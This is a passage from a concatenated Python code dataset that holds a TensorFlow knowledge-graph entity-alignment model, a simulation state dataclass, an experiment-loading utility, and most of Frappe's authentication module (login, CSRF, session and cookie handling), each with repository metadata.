attr_pvs = tf.nn.embedding_lookup(self.literal_embeds, self.attr_pos_vs)
with tf.variable_scope('cnn'):
pos_score = conv(attr_phs, attr_pas, attr_pvs, self.args.dim)
pos_score = tf.log(1 + tf.exp(-pos_score))
pos_score = tf.multiply(pos_score, self.attr_pos_ws)
pos_loss = tf.reduce_sum(pos_score)
self.attribute_loss = pos_loss
self.attribute_optimizer = generate_optimizer(self.attribute_loss, self.args.learning_rate,
opt=self.args.optimizer)
# --- The followings are cross-kg identity inference --- #
def _define_cross_kg_name_view_graph(self):
pass
def _define_cross_kg_entity_reference_relation_view_graph(self):
with tf.name_scope('cross_kg_relation_triple_placeholder'):
self.ckge_rel_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.ckge_rel_pos_rs = tf.placeholder(tf.int32, shape=[None])
self.ckge_rel_pos_ts = tf.placeholder(tf.int32, shape=[None])
with tf.name_scope('cross_kg_relation_triple_lookup'):
ckge_rel_phs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.ckge_rel_pos_hs)
ckge_rel_prs = tf.nn.embedding_lookup(self.rel_embeds, self.ckge_rel_pos_rs)
ckge_rel_pts = tf.nn.embedding_lookup(self.rv_ent_embeds, self.ckge_rel_pos_ts)
with tf.name_scope('cross_kg_relation_triple_loss'):
self.ckge_relation_loss = 2 * relation_logistic_loss_wo_negs(ckge_rel_phs, ckge_rel_prs, ckge_rel_pts)
self.ckge_relation_optimizer = generate_optimizer(self.ckge_relation_loss, self.args.learning_rate,
opt=self.args.optimizer)
def _define_cross_kg_entity_reference_attribute_view_graph(self):
with tf.name_scope('cross_kg_attribute_triple_placeholder'):
self.ckge_attr_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.ckge_attr_pos_as = tf.placeholder(tf.int32, shape=[None])
self.ckge_attr_pos_vs = tf.placeholder(tf.int32, shape=[None])
with tf.name_scope('cross_kg_attribute_triple_lookup'):
ckge_attr_phs = tf.nn.embedding_lookup(self.av_ent_embeds, self.ckge_attr_pos_hs)
ckge_attr_pas = tf.nn.embedding_lookup(self.attr_embeds, self.ckge_attr_pos_as)
ckge_attr_pvs = tf.nn.embedding_lookup(self.literal_embeds, self.ckge_attr_pos_vs)
with tf.name_scope('cross_kg_attribute_triple_loss'):
pos_score = conv(ckge_attr_phs, ckge_attr_pas, ckge_attr_pvs, self.args.dim)
self.ckge_attribute_loss = 2 * tf.reduce_sum(tf.log(1 + tf.exp(-pos_score)))
self.ckge_attribute_optimizer = generate_optimizer(self.ckge_attribute_loss, self.args.learning_rate,
opt=self.args.optimizer)
def _define_cross_kg_relation_reference_graph(self):
with tf.name_scope('cross_kg_relation_reference_placeholder'):
self.ckgp_rel_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.ckgp_rel_pos_rs = tf.placeholder(tf.int32, shape=[None])
self.ckgp_rel_pos_ts = tf.placeholder(tf.int32, shape=[None])
self.ckgp_rel_pos_ws = tf.placeholder(tf.float32, shape=[None])
with tf.name_scope('cross_kg_relation_reference_lookup'):
ckgp_rel_phs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.ckgp_rel_pos_hs)
ckgp_rel_prs = tf.nn.embedding_lookup(self.rel_embeds, self.ckgp_rel_pos_rs)
ckgp_rel_pts = tf.nn.embedding_lookup(self.rv_ent_embeds, self.ckgp_rel_pos_ts)
with tf.name_scope('cross_kg_relation_reference_loss'):
self.ckgp_relation_loss = 2 * logistic_loss_wo_negs(ckgp_rel_phs, ckgp_rel_prs, ckgp_rel_pts,
self.ckgp_rel_pos_ws)
self.ckgp_relation_optimizer = generate_optimizer(self.ckgp_relation_loss, self.args.learning_rate,
opt=self.args.optimizer)
def _define_cross_kg_attribute_reference_graph(self):
with tf.name_scope('cross_kg_attribute_reference_placeholder'):
self.ckga_attr_pos_hs = tf.placeholder(tf.int32, shape=[None])
self.ckga_attr_pos_as = tf.placeholder(tf.int32, shape=[None])
self.ckga_attr_pos_vs = tf.placeholder(tf.int32, shape=[None])
self.ckga_attr_pos_ws = tf.placeholder(tf.float32, shape=[None])
with tf.name_scope('cross_kg_attribute_reference_lookup'):
ckga_attr_phs = tf.nn.embedding_lookup(self.av_ent_embeds, self.ckga_attr_pos_hs)
ckga_attr_pas = tf.nn.embedding_lookup(self.attr_embeds, self.ckga_attr_pos_as)
ckga_attr_pvs = tf.nn.embedding_lookup(self.literal_embeds, self.ckga_attr_pos_vs)
with tf.name_scope('cross_kg_attribute_reference_loss'):
pos_score = conv(ckga_attr_phs, ckga_attr_pas, ckga_attr_pvs, self.args.dim)
pos_score = tf.log(1 + tf.exp(-pos_score))
pos_score = tf.multiply(pos_score, self.ckga_attr_pos_ws)
pos_loss = tf.reduce_sum(pos_score)
self.ckga_attribute_loss = pos_loss
# self.ckga_attribute_loss = tf.reduce_sum(tf.log(1 + tf.exp(-pos_score)))
self.ckga_attribute_optimizer = generate_optimizer(self.ckga_attribute_loss, self.args.learning_rate,
opt=self.args.optimizer)
# --- The followings are intermediate combination --- #
def _define_common_space_learning_graph(self):
with tf.name_scope('cross_name_view_placeholder'):
self.cn_hs = tf.placeholder(tf.int32, shape=[None])
with tf.name_scope('cross_name_view_lookup'):
final_cn_phs = tf.nn.embedding_lookup(self.ent_embeds, self.cn_hs)
cn_hs_names = tf.nn.embedding_lookup(self.name_embeds, self.cn_hs)
cr_hs = tf.nn.embedding_lookup(self.rv_ent_embeds, self.cn_hs)
ca_hs = tf.nn.embedding_lookup(self.av_ent_embeds, self.cn_hs)
with tf.name_scope('cross_name_view_loss'):
self.cross_name_loss = self.args.cv_name_weight * alignment_loss(final_cn_phs, cn_hs_names)
self.cross_name_loss += alignment_loss(final_cn_phs, cr_hs)
self.cross_name_loss += alignment_loss(final_cn_phs, ca_hs)
self.cross_name_optimizer = generate_optimizer(self.args.cv_weight * self.cross_name_loss,
self.args.ITC_learning_rate,
opt=self.args.optimizer)
def _define_space_mapping_graph(self):
with tf.name_scope('final_entities_placeholder'):
self.entities = tf.placeholder(tf.int32, shape=[self.args.entity_batch_size, ])
with tf.name_scope('multi_view_entities_lookup'):
final_ents = tf.nn.embedding_lookup(self.ent_embeds, self.entities)
nv_ents = tf.nn.embedding_lookup(self.name_embeds, self.entities)
rv_ents = tf.nn.embedding_lookup(self.rv_ent_embeds, self.entities)
av_ents = tf.nn.embedding_lookup(self.av_ent_embeds, self.entities)
with tf.name_scope('mapping_loss'):
nv_space_mapping_loss = space_mapping_loss(nv_ents, final_ents, self.nv_mapping, self.eye_mat,
self.args.orthogonal_weight)
rv_space_mapping_loss = space_mapping_loss(rv_ents, final_ents, self.rv_mapping, self.eye_mat,
self.args.orthogonal_weight)
av_space_mapping_loss = space_mapping_loss(av_ents, final_ents, self.av_mapping, self.eye_mat,
self.args.orthogonal_weight)
self.shared_comb_loss = nv_space_mapping_loss + rv_space_mapping_loss + av_space_mapping_loss
opt_vars = [v for v in tf.trainable_variables() if v.name.startswith("shared")]
self.shared_comb_optimizer = generate_optimizer(self.shared_comb_loss,
self.args.learning_rate,
var_list=opt_vars,
opt=self.args.optimizer)
def eval_kg1_ent_embeddings(self):
embeds = tf.nn.embedding_lookup(self.rv_ent_embeds, self.kgs.kg1.entities_list)
return embeds.eval(session=self.session)
def eval_kg2_ent_embeddings(self):
embeds = tf.nn.embedding_lookup(self.rv_ent_embeds, self.kgs.kg2.entities_list)
return embeds.eval(session=self.session)
def eval_kg1_useful_ent_embeddings(self):
embeds = tf.nn.embedding_lookup(self.rv_ent_embeds, self.kgs.useful_entities_list1)
return embeds.eval(session=self.session)
def eval_kg2_useful_ent_embeddings(self):
embeds = tf.nn.embedding_lookup(self.rv_ent_embeds, self.kgs.useful_entities_list2)
return embeds.eval(session=self.session)
def save(self):
ent_embeds = self.ent_embeds.eval(session=self.session)
nv_ent_embeds = self.name_embeds.eval(session=self.session)
rv_ent_embeds = self.rv_ent_embeds.eval(session=self.session)
av_ent_embeds = self.av_ent_embeds.eval(session=self.session)
rel_embeds = self.rel_embeds.eval(session=self.session)
att_embeds = self.rel_embeds.eval(session=self.session)
save_embeddings(self.out_folder, self.kgs, ent_embeds, nv_ent_embeds, rv_ent_embeds, av_ent_embeds,
rel_embeds, att_embeds)
# --- The followings are training for multi-view embeddings --- #
def train_relation_view_1epo(self, epoch, triple_steps, steps_tasks, batch_queue, neighbors1, neighbors2):
start = time.time()
epoch_loss = 0
trained_samples_num = 0
for steps_task in steps_tasks:
mp.Process(target=bat.generate_relation_triple_batch_queue,
args=(self.kgs.kg1.local_relation_triples_list, self.kgs.kg2.local_relation_triples_list,
self.kgs.kg1.local_relation_triples_set, self.kgs.kg2.local_relation_triples_set,
self.kgs.kg1.entities_list, self.kgs.kg2.entities_list,
self.args.batch_size, steps_task,
batch_queue, neighbors1, neighbors2, self.args.neg_triple_num)).start()
for i in range(triple_steps):
batch_pos, batch_neg = batch_queue.get()
batch_loss, _ = self.session.run(fetches=[self.relation_loss, self.relation_optimizer],
feed_dict={self.rel_pos_hs: [x[0] for x in batch_pos],
self.rel_pos_rs: [x[1] for x in batch_pos],
self.rel_pos_ts: [x[2] for x in batch_pos],
self.rel_neg_hs: [x[0] for x in batch_neg],
self.rel_neg_rs: [x[1] for x in batch_neg],
self.rel_neg_ts: [x[2] for x in batch_neg]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
random.shuffle(self.kgs.kg1.local_relation_triples_list)
random.shuffle(self.kgs.kg2.local_relation_triples_list)
end = time.time()
print('epoch {} of rel. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch, epoch_loss, end - start))
def train_attribute_view_1epo(self, epoch, triple_steps, steps_tasks, batch_queue, neighbors1, neighbors2):
start = time.time()
epoch_loss = 0
trained_samples_num = 0
for steps_task in steps_tasks:
mp.Process(target=generate_attribute_triple_batch_queue,
args=(self.predicate_align_model.attribute_triples_w_weights1,
self.predicate_align_model.attribute_triples_w_weights2,
self.predicate_align_model.attribute_triples_w_weights_set1,
self.predicate_align_model.attribute_triples_w_weights_set2,
self.kgs.kg1.entities_list, self.kgs.kg2.entities_list,
self.args.attribute_batch_size, steps_task,
batch_queue, neighbors1, neighbors2, 0)).start()
for i in range(triple_steps):
batch_pos, batch_neg = batch_queue.get()
batch_loss, _ = self.session.run(fetches=[self.attribute_loss, self.attribute_optimizer],
feed_dict={self.attr_pos_hs: [x[0] for x in batch_pos],
self.attr_pos_as: [x[1] for x in batch_pos],
self.attr_pos_vs: [x[2] for x in batch_pos],
self.attr_pos_ws: [x[3] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
random.shuffle(self.predicate_align_model.attribute_triples_w_weights1)
random.shuffle(self.predicate_align_model.attribute_triples_w_weights2)
end = time.time()
print('epoch {} of att. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch, epoch_loss, end - start))
# --- The followings are training for cross-kg identity inference --- #
def train_cross_kg_entity_inference_relation_view_1epo(self, epoch, sup_triples):
if len(sup_triples) == 0:
return
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(sup_triples) / self.args.batch_size))
batch_size = self.args.batch_size if steps > 1 else len(sup_triples)
for i in range(steps):
batch_pos = random.sample(sup_triples, batch_size)
batch_loss, _ = self.session.run(fetches=[self.ckge_relation_loss, self.ckge_relation_optimizer],
feed_dict={self.ckge_rel_pos_hs: [x[0] for x in batch_pos],
self.ckge_rel_pos_rs: [x[1] for x in batch_pos],
self.ckge_rel_pos_ts: [x[2] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of cross-kg entity inference in rel. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch,
epoch_loss,
end - start))
def train_cross_kg_entity_inference_attribute_view_1epo(self, epoch, sup_triples):
if len(sup_triples) == 0:
return
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(sup_triples) / self.args.attribute_batch_size))
batch_size = self.args.attribute_batch_size if steps > 1 else len(sup_triples)
for i in range(steps):
batch_pos = random.sample(sup_triples, batch_size)
batch_loss, _ = self.session.run(fetches=[self.ckge_attribute_loss, self.ckge_attribute_optimizer],
feed_dict={self.ckge_attr_pos_hs: [x[0] for x in batch_pos],
self.ckge_attr_pos_as: [x[1] for x in batch_pos],
self.ckge_attr_pos_vs: [x[2] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of cross-kg entity inference in attr. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch,
epoch_loss,
end - start))
def train_cross_kg_relation_inference_1epo(self, epoch, sup_triples):
if len(sup_triples) == 0:
return
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(sup_triples) / self.args.batch_size))
batch_size = self.args.batch_size if steps > 1 else len(sup_triples)
for i in range(steps):
batch_pos = random.sample(sup_triples, batch_size)
batch_loss, _ = self.session.run(fetches=[self.ckgp_relation_loss, self.ckgp_relation_optimizer],
feed_dict={self.ckgp_rel_pos_hs: [x[0] for x in batch_pos],
self.ckgp_rel_pos_rs: [x[1] for x in batch_pos],
self.ckgp_rel_pos_ts: [x[2] for x in batch_pos],
self.ckgp_rel_pos_ws: [x[3] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of cross-kg relation inference in rel. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch,
epoch_loss,
end - start))
def train_cross_kg_attribute_inference_1epo(self, epoch, sup_triples):
if len(sup_triples) == 0:
return
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(sup_triples) / self.args.attribute_batch_size))
batch_size = self.args.attribute_batch_size if steps > 1 else len(sup_triples)
for i in range(steps):
batch_pos = random.sample(sup_triples, batch_size)
batch_loss, _ = self.session.run(fetches=[self.ckga_attribute_loss, self.ckga_attribute_optimizer],
feed_dict={self.ckga_attr_pos_hs: [x[0] for x in batch_pos],
self.ckga_attr_pos_as: [x[1] for x in batch_pos],
self.ckga_attr_pos_vs: [x[2] for x in batch_pos],
self.ckga_attr_pos_ws: [x[3] for x in batch_pos]})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of cross-kg attribute inference in attr. view, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch,
epoch_loss,
end - start))
def train_shared_space_mapping_1epo(self, epoch, entities):
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(entities) / self.args.entity_batch_size))
batch_size = self.args.entity_batch_size if steps > 1 else len(entities)
for i in range(steps):
batch_pos = random.sample(entities, batch_size)
batch_loss, _ = self.session.run(fetches=[self.shared_comb_loss, self.shared_comb_optimizer],
feed_dict={self.entities: batch_pos})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of shared space learning, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch, epoch_loss,
end - start))
# --- The followings are training for cross-view inference --- #
def train_common_space_learning_1epo(self, epoch, entities):
start = time.time()
epoch_loss = 0
trained_samples_num = 0
steps = int(math.ceil(len(entities) / self.args.entity_batch_size))
batch_size = self.args.entity_batch_size if steps > 1 else len(entities)
for i in range(steps):
batch_pos = random.sample(entities, batch_size)
batch_loss, _ = self.session.run(fetches=[self.cross_name_loss, self.cross_name_optimizer],
feed_dict={self.cn_hs: batch_pos})
trained_samples_num += len(batch_pos)
epoch_loss += batch_loss
epoch_loss /= trained_samples_num
end = time.time()
print('epoch {} of common space learning, avg. loss: {:.4f}, time: {:.4f}s'.format(epoch, epoch_loss,
end - start))
| 60.767932 | 125 | 0.60259 |
4a1f7a78b6e4b2cd4817d5369393e5bea5682eb1 | 138 | py | Python | control/simulation/state.py | oholsen/hagedag | 4e2881fa1f636228e5cbe76e61fb4b224f0b1e4a | [
"Apache-2.0"
] | null | null | null | control/simulation/state.py | oholsen/hagedag | 4e2881fa1f636228e5cbe76e61fb4b224f0b1e4a | [
"Apache-2.0"
] | null | null | null | control/simulation/state.py | oholsen/hagedag | 4e2881fa1f636228e5cbe76e61fb4b224f0b1e4a | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
@dataclass
class State:
x: float
y: float
theta: float
speed: float
omega: float
| 11.5 | 33 | 0.65942 |
4a1f7aef028afe9632f01dede332782f2024cd7e | 5,427 | py | Python | zscomm/vary_play_param_experiment.py | DylanCope/zero-shot-comm | ff92981392ec94ad8d6873ce1e8be19add9c6627 | [
"MIT"
] | null | null | null | zscomm/vary_play_param_experiment.py | DylanCope/zero-shot-comm | ff92981392ec94ad8d6873ce1e8be19add9c6627 | [
"MIT"
] | null | null | null | zscomm/vary_play_param_experiment.py | DylanCope/zero-shot-comm | ff92981392ec94ad8d6873ce1e8be19add9c6627 | [
"MIT"
] | 1 | 2021-08-31T20:16:49.000Z | 2021-08-31T20:16:49.000Z | from pathlib import Path
import json
import tensorflow as tf
from .loss import *
from .meta_experiment import MetaExperiment
class VaryPlayParamExperiment(MetaExperiment):
def __init__(self,
param_vals = None,
param_name = 'p_mutate',
save_location=None,
num_experiments_per_val=3,
name='vary_pm_experiment',
**experiment_kwargs):
self.name = name
self.param_name = param_name
self.num_experiments = len(param_vals)
self.experiments = [
{
param_name: val,
'experiment': MetaExperiment(
print_prehistory=self.print_history,
name=f'meta_experiment_{param_name}={val}',
export_location=None if save_location is None else \
f'{save_location}/{param_name}={val}',
num_experiments=num_experiments_per_val,
**{param_name: val, **experiment_kwargs}
),
'status': 'Not Run',
'results': None,
'index': i,
}
for i, val in enumerate(param_vals)
]
self.save_location = save_location
if save_location is not None:
self.load_history(save_location)
def get_experiment_results(self, meta_experiment):
return meta_experiment.results
def _get_results(self):
return [
item['results'] for item in self.experiments
]
def print_prehistory(self):
pass
def load_sub_experiment(self, experiment, path):
history_path = path / 'training_history.json'
history = json.load(history_path.open(mode='r'))
results_path = path / 'results.json'
if results_path.exists():
results = json.load(results_path.open(mode='r'))
else:
results = [
item['test_metrics'] for item in history
if 'test_metrics' in item
][-1]
config_path = path / 'config.json'
if config_path.exists():
config = json.load(config_path.open(mode='r'))
# assuming that the experiment is self-play
experiment.student.load_weights(str(path / 'agent_weights'))
else:
config = {'epochs_optimised': len(history)}
experiment.epoch = config['epochs_optimised']
experiment.training_history = history
experiment.results = results
return experiment
def load_meta_exp(self, meta_exp_path):
metadata = json.load((meta_exp_path / 'meta.json').open(mode='r'))
results = json.load((meta_exp_path / 'results.json').open(mode='r'))
if 'experiment_config' in metadata:
play_params = metadata['experiment_config']['play_params']
param_val = play_params[self.param_name]
elif self.param_name in metadata:
param_val = metadata[self.param_name]
i, *_ = [i for i, item in enumerate(self.experiments)
if item[self.param_name] == param_val]
self.experiments[i]['status'] = 'Complete'
self.experiments[i]['results'] = results
meta_exp = self.experiments[i]['experiment']
meta_exp.results = results
j = 0
for sub_exp_path in meta_exp_path.glob('*'):
try:
if not sub_exp_path.is_file():
sub_exp = meta_exp.experiments[j]['experiment']
meta_exp.experiments[j]['experiment'] = \
self.load_sub_experiment(sub_exp, sub_exp_path)
meta_exp.experiments[j]['status'] = 'Complete'
meta_exp.experiments[j]['results'] = \
meta_exp.experiments[j]['experiment'].results
j += 1
except:
pass
def load_history(self, history_location):
exp_path = Path(history_location)
for meta_exp_path in exp_path.glob('*'):
results_path = meta_exp_path / 'results.json'
history_path = meta_exp_path / 'training_history.json'
if results_path.exists() or history_path.exists():
self.load_meta_exp(meta_exp_path)
def export_experiment(self, experiment):
if self.save_location is not None:
experiment_config = \
experiment.experiments[0]['experiment'].get_config()
i, *_ = [i for i, x in enumerate(self.experiments)
if x['experiment'] == experiment]
meta_data = {
'index': i,
'experiment_config': experiment_config
}
meta_data_path = \
Path(f'{experiment.export_location}/meta.json')
with meta_data_path.open(mode='w') as f:
json.dump(meta_data, f)
results_path = \
Path(f'{experiment.export_location}/results.json')
with results_path.open(mode='w') as f:
json.dump(experiment.results, f)
print('Saved experiment data at:',
experiment.export_location)
| 35.940397 | 76 | 0.544315 |
4a1f7b2be503079581a7bb5e4ff04a706223d3e1 | 13,937 | py | Python | frappe/auth.py | puspita-sari/frappe | 68d28442c23b55350c2c28abaada47f4da64a2e8 | [
"MIT"
] | null | null | null | frappe/auth.py | puspita-sari/frappe | 68d28442c23b55350c2c28abaada47f4da64a2e8 | [
"MIT"
] | null | null | null | frappe/auth.py | puspita-sari/frappe | 68d28442c23b55350c2c28abaada47f4da64a2e8 | [
"MIT"
] | null | null | null | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import datetime
from frappe import _
import frappe
import frappe.database
import frappe.utils
from frappe.utils import cint, flt, get_datetime, datetime, date_diff, today
import frappe.utils.user
from frappe import conf
from frappe.sessions import Session, clear_sessions, delete_session
from frappe.modules.patch_handler import check_session_stopped
from frappe.translate import get_lang_code
from frappe.utils.password import check_password, delete_login_failed_cache
from frappe.core.doctype.activity_log.activity_log import add_authentication_log
from frappe.twofactor import (should_run_2fa, authenticate_for_2factor,
confirm_otp_token, get_cached_user_pass)
from six.moves.urllib.parse import quote
class HTTPRequest:
def __init__(self):
# Get Environment variables
self.domain = frappe.request.host
if self.domain and self.domain.startswith('www.'):
self.domain = self.domain[4:]
if frappe.get_request_header('X-Forwarded-For'):
frappe.local.request_ip = (frappe.get_request_header('X-Forwarded-For').split(",")[0]).strip()
elif frappe.get_request_header('REMOTE_ADDR'):
frappe.local.request_ip = frappe.get_request_header('REMOTE_ADDR')
else:
frappe.local.request_ip = '127.0.0.1'
# language
self.set_lang()
# load cookies
frappe.local.cookie_manager = CookieManager()
# set db
self.connect()
# login
frappe.local.login_manager = LoginManager()
if frappe.form_dict._lang:
lang = get_lang_code(frappe.form_dict._lang)
if lang:
frappe.local.lang = lang
self.validate_csrf_token()
# write out latest cookies
frappe.local.cookie_manager.init_cookies()
# check status
check_session_stopped()
def validate_csrf_token(self):
if frappe.local.request and frappe.local.request.method in ("POST", "PUT", "DELETE"):
if not frappe.local.session: return
if not frappe.local.session.data.csrf_token \
or frappe.local.session.data.device=="mobile" \
or frappe.conf.get('ignore_csrf', None):
# not via boot
return
csrf_token = frappe.get_request_header("X-Frappe-CSRF-Token")
if not csrf_token and "csrf_token" in frappe.local.form_dict:
csrf_token = frappe.local.form_dict.csrf_token
del frappe.local.form_dict["csrf_token"]
if frappe.local.session.data.csrf_token != csrf_token:
frappe.local.flags.disable_traceback = True
frappe.throw(_("Invalid Request"), frappe.CSRFTokenError)
def set_lang(self):
from frappe.translate import guess_language
frappe.local.lang = guess_language()
def get_db_name(self):
"""get database name from conf"""
return conf.db_name
def connect(self, ac_name = None):
"""connect to db, from ac_name or db_name"""
frappe.local.db = frappe.database.get_db(user = self.get_db_name(), \
password = getattr(conf, 'db_password', ''))
class LoginManager:
def __init__(self):
self.user = None
self.info = None
self.full_name = None
self.user_type = None
if frappe.local.form_dict.get('cmd')=='login' or frappe.local.request.path=="/api/method/login":
if self.login()==False: return
self.resume = False
# run login triggers
self.run_trigger('on_session_creation')
else:
try:
self.resume = True
self.make_session(resume=True)
self.get_user_info()
self.set_user_info(resume=True)
except AttributeError:
self.user = "Guest"
self.get_user_info()
self.make_session()
self.set_user_info()
def login(self):
# clear cache
frappe.clear_cache(user = frappe.form_dict.get('usr'))
user, pwd = get_cached_user_pass()
self.authenticate(user=user, pwd=pwd)
if self.force_user_to_reset_password():
doc = frappe.get_doc("User", self.user)
frappe.local.response["redirect_to"] = doc.reset_password(send_email=False, password_expired=True)
frappe.local.response["message"] = "Password Reset"
return False
if should_run_2fa(self.user):
authenticate_for_2factor(self.user)
if not confirm_otp_token(self):
return False
self.post_login()
def post_login(self):
self.run_trigger('on_login')
validate_ip_address(self.user)
self.validate_hour()
self.get_user_info()
self.make_session()
self.set_user_info()
def get_user_info(self, resume=False):
self.info = frappe.db.get_value("User", self.user,
["user_type", "first_name", "last_name", "user_image"], as_dict=1)
self.user_type = self.info.user_type
def set_user_info(self, resume=False):
# set sid again
frappe.local.cookie_manager.init_cookies()
self.full_name = " ".join(filter(None, [self.info.first_name,
self.info.last_name]))
if self.info.user_type=="Website User":
frappe.local.cookie_manager.set_cookie("system_user", "no")
if not resume:
frappe.local.response["message"] = "No App"
frappe.local.response["home_page"] = get_website_user_home_page(self.user)
else:
frappe.local.cookie_manager.set_cookie("system_user", "yes")
if not resume:
frappe.local.response['message'] = 'Logged In'
frappe.local.response["home_page"] = "/desk#dashboard"
if not resume:
frappe.response["full_name"] = self.full_name
# redirect information
redirect_to = frappe.cache().hget('redirect_after_login', self.user)
if redirect_to:
frappe.local.response["redirect_to"] = redirect_to
frappe.cache().hdel('redirect_after_login', self.user)
frappe.local.cookie_manager.set_cookie("full_name", self.full_name)
frappe.local.cookie_manager.set_cookie("user_id", self.user)
frappe.local.cookie_manager.set_cookie("user_image", self.info.user_image or "")
def make_session(self, resume=False):
# start session
frappe.local.session_obj = Session(user=self.user, resume=resume,
full_name=self.full_name, user_type=self.user_type)
# reset user if changed to Guest
self.user = frappe.local.session_obj.user
frappe.local.session = frappe.local.session_obj.data
self.clear_active_sessions()
def clear_active_sessions(self):
"""Clear other sessions of the current user if `deny_multiple_sessions` is not set"""
if not (cint(frappe.conf.get("deny_multiple_sessions")) or cint(frappe.db.get_system_setting('deny_multiple_sessions'))):
return
if frappe.session.user != "Guest":
clear_sessions(frappe.session.user, keep_current=True)
def authenticate(self, user=None, pwd=None):
if not (user and pwd):
user, pwd = frappe.form_dict.get('usr'), frappe.form_dict.get('pwd')
if not (user and pwd):
self.fail(_('Incomplete login details'), user=user)
if cint(frappe.db.get_value("System Settings", "System Settings", "allow_login_using_mobile_number")):
user = frappe.db.get_value("User", filters={"mobile_no": user}, fieldname="name") or user
if cint(frappe.db.get_value("System Settings", "System Settings", "allow_login_using_user_name")):
user = frappe.db.get_value("User", filters={"username": user}, fieldname="name") or user
self.check_if_enabled(user)
self.user = self.check_password(user, pwd)
def force_user_to_reset_password(self):
if not self.user:
return
reset_pwd_after_days = cint(frappe.db.get_single_value("System Settings",
"force_user_to_reset_password"))
if reset_pwd_after_days:
last_password_reset_date = frappe.db.get_value("User",
self.user, "last_password_reset_date") or today()
last_pwd_reset_days = date_diff(today(), last_password_reset_date)
if last_pwd_reset_days > reset_pwd_after_days:
return True
def check_if_enabled(self, user):
"""raise exception if user not enabled"""
doc = frappe.get_doc("System Settings")
if cint(doc.allow_consecutive_login_attempts) > 0:
check_consecutive_login_attempts(user, doc)
if user=='Administrator': return
if not cint(frappe.db.get_value('User', user, 'enabled')):
self.fail('User disabled or missing', user=user)
def check_password(self, user, pwd):
"""check password"""
try:
# returns user in correct case
return check_password(user, pwd)
except frappe.AuthenticationError:
self.update_invalid_login(user)
self.fail('Incorrect password', user=user)
def fail(self, message, user=None):
if not user:
user = _('Unknown User')
frappe.local.response['message'] = message
add_authentication_log(message, user, status="Failed")
frappe.db.commit()
raise frappe.AuthenticationError
def update_invalid_login(self, user):
last_login_tried = get_last_tried_login_data(user)
failed_count = 0
if last_login_tried > get_datetime():
failed_count = get_login_failed_count(user)
frappe.cache().hset('login_failed_count', user, failed_count + 1)
def run_trigger(self, event='on_login'):
for method in frappe.get_hooks().get(event, []):
frappe.call(frappe.get_attr(method), login_manager=self)
def validate_hour(self):
"""check if user is logging in during restricted hours"""
login_before = int(frappe.db.get_value('User', self.user, 'login_before', ignore=True) or 0)
login_after = int(frappe.db.get_value('User', self.user, 'login_after', ignore=True) or 0)
if not (login_before or login_after):
return
from frappe.utils import now_datetime
current_hour = int(now_datetime().strftime('%H'))
if login_before and current_hour > login_before:
frappe.throw(_("Login not allowed at this time"), frappe.AuthenticationError)
if login_after and current_hour < login_after:
frappe.throw(_("Login not allowed at this time"), frappe.AuthenticationError)
def login_as_guest(self):
"""login as guest"""
self.login_as("Guest")
def login_as(self, user):
self.user = user
self.post_login()
def logout(self, arg='', user=None):
if not user: user = frappe.session.user
self.run_trigger('on_logout')
if user == frappe.session.user:
delete_session(frappe.session.sid, user=user, reason="User Manually Logged Out")
self.clear_cookies()
else:
clear_sessions(user)
def clear_cookies(self):
clear_cookies()
class CookieManager:
def __init__(self):
self.cookies = {}
self.to_delete = []
def init_cookies(self):
if not frappe.local.session.get('sid'): return
# sid expires in 3 days
expires = datetime.datetime.now() + datetime.timedelta(days=3)
if frappe.session.sid:
self.cookies["sid"] = {"value": frappe.session.sid, "expires": expires}
if frappe.session.session_country:
self.cookies["country"] = {"value": frappe.session.get("session_country")}
def set_cookie(self, key, value, expires=None):
self.cookies[key] = {"value": value, "expires": expires}
def delete_cookie(self, to_delete):
if not isinstance(to_delete, (list, tuple)):
to_delete = [to_delete]
self.to_delete.extend(to_delete)
def flush_cookies(self, response):
for key, opts in self.cookies.items():
response.set_cookie(key, quote((opts.get("value") or "").encode('utf-8')),
expires=opts.get("expires"))
# expires yesterday!
expires = datetime.datetime.now() + datetime.timedelta(days=-1)
for key in set(self.to_delete):
response.set_cookie(key, "", expires=expires)
@frappe.whitelist()
def get_logged_user():
return frappe.session.user
def clear_cookies():
if hasattr(frappe.local, "session"):
frappe.session.sid = ""
frappe.local.cookie_manager.delete_cookie(["full_name", "user_id", "sid", "user_image", "system_user"])
def get_website_user_home_page(user):
home_page_method = frappe.get_hooks('get_website_user_home_page')
if home_page_method:
home_page = frappe.get_attr(home_page_method[-1])(user)
return '/' + home_page.strip('/')
elif frappe.get_hooks('website_user_home_page'):
